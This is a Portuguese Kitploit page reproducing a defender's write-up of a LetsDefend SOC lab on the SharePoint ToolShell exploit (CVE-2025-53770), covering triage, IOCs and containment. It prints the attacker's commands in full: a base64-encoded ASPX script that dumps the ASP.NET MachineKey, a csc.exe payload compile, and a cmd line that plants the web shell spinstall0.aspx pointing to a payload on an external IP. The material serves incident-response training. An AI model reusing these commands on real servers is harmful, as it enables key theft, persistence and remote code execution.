Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell — Guia detalhado da exploração da vulnerabilidade zero-day CVE-2025-53770 (ToolShell) no SharePoint, incluindo análise de RCE, exfiltração de MachineKey, compilação de payload, implantação de web shell e etapas de contenção de resposta a incidentes. | Kitploit
Ferramentas/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
Gerenciamento de Indicadores de Comprometimento (IOC)Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAnálise de MalwareForensia DigitalTestes de PenetraçãoInteligência de AmeaçasAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Resposta a Incidentes
Labs e Prática
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Guia detalhado da exploração da vulnerabilidade zero-day CVE-2025-53770 (ToolShell) no SharePoint, incluindo análise de RCE, exfiltração de MachineKey, compilação de payload, implantação de web shell e etapas de contenção de resposta a incidentes.

Ver Repositório
há 10 mesesAinda não revisado

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Introdução

Eu investiguei um zero-day do SharePoint chamado ToolShell (CVE-2025-53770) no laboratório LetsDefend. Simulei um ataque zero-day do mundo real onde uma requisição POST maliciosa contornou a autenticação, executou PowerShell para roubar chaves MachineKeySection, compilou payload.exe e implantou uma web shell (spinstall0.aspx). Registrei tudo, analisei o comportamento e contive o host. Este README cobre os processos do ataque, os passos para mitigar o ataque e as lições aprendidas.

Visão Geral do Laboratório

  • Platform: LetsDefend Cyber Range
  • Target: SharePoint Server (SharePoint01)
  • CVE: CVE-2025-53770
  • Objective: Analisar RCE, praticar detecção e contenção

Ferramentas Utilizadas:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • LetsDefend Log Management
  • LetsDefend Enpoint Security
  • Base64 Decoder
  • LetsDefend Threat Intel

O Alerta

image

Este é um alerta crítico e uma atividade suspeita que teve como alvo o ToolPane.aspx do MS SharePoint com grande payload e Referer falsificado. O contexto CVE está vinculado ao CVE-2025-53770. É uma vulnerabilidade crítica de exploração do SharePoint através de uma requisição POST especialmente elaborada que permitia atacantes não autenticados. A exploração bem-sucedida levou à execução remota de código (RCE) no servidor. Tratei isso como ativo, alta urgência e assumi possível comprometimento bem-sucedido até prova em contrário.

Um Breve Significado do SharePoint

Microsoft SharePoint é uma plataforma para colaboração empresarial e gerenciamento de documentos — essencialmente um hub seguro e organizado para arquivos, fluxos de trabalho e aplicativos web internos.

Usos Principais

  • Gerenciamento de Documentos: Controle de versão, trilhas de auditoria e permissões de arquivos
  • Colaboração: Vários usuários podem co-editar e compartilhar documentos
  • Intranet / Portais: Notícias internas, políticas de RH, dashboards
  • Fluxos de Trabalho e Automação: Formulários, aprovações e notificações
  • Integração: Conecta-se com Teams, Outlook, aplicativos Office e Power BI

Considerações de Segurança do SharePoint

  • Utiliza Active Directory ou SSO para autenticação
  • Dados criptografados em repouso e em trânsito
  • Web parts e layouts podem ser abusados se mal configurados
  • A aplicação regular de patches é crítica para se defender contra explorações zero-day

O que é CVE-2025-53770 (ToolShell)

Um zero-day crítico no Microsoft SharePoint Server que permite que atacantes executem código remotamente sem autenticação. Ele abusa da desserialização insegura e frequentemente se encadeia com outras falhas do SharePoint (CVE-2025-49704, CVE-2025-49706) para assumir completamente o sistema. Classificado como CVSS 9.8 (Crítico) e ativamente explorado na natureza.

Análise do Ataque com VirusTotal

Analisei o endereço IP do remetente (Endereço IP de Origem) com VirusTotal Endereço IP de Origem: 107.191.58.76 image

A partir disso, posso ver que 15/95 fornecedores de segurança marcaram este endereço IP como malicioso, o que já diz muito sobre o IP.

Localização do IP

Agora preciso pesquisar a localização do IP. Isso foi feito com a ajuda do AbuseIPDB e, conforme mostrado abaixo, o IP é conhecido por hacking, força bruta, ataque a aplicações web, varredura de portas, envenenamento de DNS.

image

Análise de Endpoint

Como um Analista de SOC resolvendo isso, uma das etapas importantes a serem tomadas é a análise de endpoint. Procurei pelo host na segurança de endpoint com o nome 'SharePoint01' e, como o IP é conhecido por hacking, para análise adicional.

image

após localizar o host, visitei o histórico do terminal para verificar a linha de comando

image

| Linha de Comando do Histórico do Terminal

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

Flags do PowerShell: -nop -w hidden -e

  • -nop = Sem perfil (evitar scripts de perfil).
  • -w hidden = iniciar janela oculta (furtiva).
  • -e = comando codificado

Descobertas da Linha de Comando com Decodificador Base64:

Devido ao Payload, prossegui com o decodificador Base64 para decodificar o comando conforme mostrado abaixo

image

O usuário iniciou o powershell a partir do diretório do sistema “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” e com comandos codificados de script C# do lado do servidor ASP.NET.

  • Usa reflexão para carregar o assembly System.Web,
  • Acessa o MachineKeySection não público e chama um método não público (GetApplicationConfig),
  • Lê os valores MachineKey da aplicação web (ValidationKey, DecryptionKey, etc.),
  • Escreve essas chaves na resposta HTTP (ou seja, as exfiltra).

Capturando Payloads e Atividades Pós-Exploração: / _layouts/15/ToolPane.aspx?...

O payload tenta ler e vazar a MachineKey do ASP.NET para o host, um segredo que pode ser usado para forjar tokens ViewState/desserialização e permitir bypass de autenticação e execução remota de código. Isso corresponde ao padrão de exploração do ToolShell (abuso de MachineKey. Indicadores Chave de Comprometimento (IoCs) no comando com o uso de Decodificação e Codificação Base64.

  • O POST + payload grande + este comando codificado indica que o atacante provavelmente tentou criar ou executar tal script do lado do servidor através do caminho de exploração ToolShell.
  • A exposição da máquina e o alerta foram acionados: O uso de -encodedCommand + janela oculta + payload base64 indica evasão e exploração automatizada. Atacantes frequentemente usam -encodedCommand para esconder payloads e evitar padrões de detecção/registro de linha de comando permite que um atacante crie View State malicioso ou payloads serializados que a aplicação aceitará como válidos, possibilitando bypass de autenticação e execução remota de código em instâncias vulneráveis do SharePoint. Para ToolShell (CVE-2025-53770), esta é exatamente a cadeia de exploração.

Execução e Exploração de CMD

O atacante tentou acessar configuração privada e visa explorar, portanto, abusando do .NET. Do decodificador Base64, podemos ver System.Web.Configuration.MachineKeySection e GetApplicationConfig: MachineKeySection contém: - A ValidationKey da máquina/aplicação - A DecryptionKey da máquina/aplicação. Essas chaves são segredos usados para proteger viewstate e autenticação de formulários. Recuperá-las é uma tentativa direta de obter material que permite forjar/validar payloads serializados do ASP.NET → pré-condição direta para RCE baseada em desserialização.

DESCOBERTA DE COMANDOS CMD:

Apenas TRÊS segundos depois, conforme mostrado acima, o atacante enviou outro comando

image

| Linha de Comando do Histórico do Terminal

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs.

Descobertas

  • Os comandos mostram um compilador C# (csc.exe) que acompanha o .NET framework. Sua função é pegar código fonte (arquivos .cs) e compilar em assembly .NET geralmente .exe ou .dll.
  • O atacante enviou ou criou um arquivo fonte C# (payload.cs) no host vítima, depois usou o compilador .NET embutido (csc.exe) para compilá-lo em um executável Windows (payload.exe). Este payload poderia ser um malware.

OUTRA DESCOBERTA DE COMANDOS CMD:

Apenas DOIS segundos depois, conforme mostrado acima, o atacante enviou outro comando

image

| Linha de Comando do Histórico do Terminal

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs."C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx.

Descobertas

  • O atacante usou cmd.exe para criar um novo arquivo ASPX (spinstall0.aspx) dentro do diretório LAYOUTS do SharePoint, ecoando um formulário/objeto HTML nesse caminho.
  • O ASPX injetado contém um com Url="http://107.191.58.76/payload.exe", direcionando o servidor ou um visitante para aquele payload remoto.
  • Colocar o arquivo em ...\TEMPLATE\LAYOUTS\ o torna disponível através da aplicação web do SharePoint (um backdoor/dropper persistente acessível pela web).
  • Isso indica tentativa de entrega/execução remota de payload.exe a partir do host controlado pelo atacante (107.191.58.76) e é um sinal claro de comprometimento e ameaça de persistência.
  • OUTRA DESCOBERTA DE COMANDOS CMD:

    Apenas CINCO segundos depois, conforme mostrado acima, o atacante enviou outro comando

    image

    | Linha de Comando do Histórico do Terminal

    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command"[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

    Descobertas

    • Executou PowerShell novamente para chamar System.Web.Configuration.MachineKeySection.GetApplicationConfig(), que lê a configuração MachineKey da aplicação.
    • Isso recupera a ValidationKey/DecryptionKey usadas para assinar/criptografar ViewState e tokens de autenticação, material que um atacante pode usar para forjar payloads serializados e bypassar autenticação.
    • Este é um passo claro e consistente de reconhecimento/exfiltração em uma cadeia de exploração estilo ToolShell (preparação para RCE) que foi invocado manualmente.

    Estas atividades mostram um padrão consistente e tratarei como alta confiança, comprometido e coletarei artefatos forenses imediatamente.

    Inteligência de Ameaças

Baixar ferramenta

Após reunir todos os comandos e descobertas, fiz mais pesquisas na inteligência de ameaças e pesquisei por tipo de dado IP. A fonte de dados mostra OnlyHunt e TAG CVE-2025-53770 e com Referer: /_layouts/SignOut.aspx para o canal de investigação de alertas mostra que é um sharepoint legítimo que foi falsificado ou usado e posteriormente desconectado do sharepoint para parecer que se originou de uma ação normal do sharepoint. Nesse ponto, contive o host.

image

IOC (Artefatos)

  • IP 107.191.58.76: IP de origem do atacante observado enviando POST de exploração
  • /_layouts/15/ToolPane.aspx?DisplayMode=Edit: Tipo "url". Endpoint de exploração alvo pelo POST
  • Spinstall0.aspx: Tipo "filename". Nome do arquivo backdoor ASPX malicioso implantado
  • MachineKeySection: Tipo "string". String de código ASPX indicando exfiltração de MachineKey

Minha Nota de Análise e Resumo

Nota do Analista — SOC342 (CVE-2025-53770 / ToolShell) — SharePoint01

Data/Hora:2025-07-2213:07(evento) Analista:[SeuNome] CaseID:SOC342 Host:SharePoint01 Gravidade: Crítica

RESUMO

Identifiquei uma tentativa de exploração de vulnerabilidade zero-day crítica às 2025-07-22 13:07 chamada ToolShell (CVE-2025-53770) em um SharePoint Server on-premises com nome de host SharePoint01. O atacante, a partir de um IP malicioso conhecido (107.191.58.76) que é a fonte do POST e host do payload, contornou a autenticação para executar código remoto no servidor. O atacante enviou/criou spinstall0.aspx no diretório LAYOUTS do SharePoint e executou PowerShell para ler material MachineKey do ASP.NET e compilar um payload C# via csc.exe. Portanto, permitindo que eles criassem payloads confiáveis. Esta atividade é consistente com implantação de web shell com spinstall0.aspx no sharepoint, exfiltração de MachineKey e compilação de payload no host, todos indicadores de comprometimento de alta confiança.

ATUALIZANDO MINHA NOTA DE ANALISTA DO PLAYBOOK

image
image

PASSOS RECOMENDADOS A SEREM TOMADOS PARA MITIGAR AS ATIVIDADES DO ATACANTE:

Após descobrir o comprometimento, recomendei na Nota do Analista que os seguintes passos fossem tomados

  1. Conter: Se autorizado, isolar SharePoint01 da rede; caso contrário, manter restrições de saída e bloquear IPs/clusters do atacante.
  2. Caçar: Pesquisar todos os SharePoint e garantir backups adequados
  3. Erradicar: Remover arquivos maliciosos confirmados e quaisquer tarefas/serviços agendados não autorizados; inspecionar por persistência adicional.
  4. Mitigar: Rotacionar valores ASP.NET/MachineKey e aplicar patches de emergência de julho de 2025 da Microsoft em todas as instâncias SharePoint on-premises. Coordenar a rotação com os proprietários das aplicações.
  5. Detectar e Prevenir: Implantar/adicionar regras de detecção e caçar no ambiente por atividade semelhante.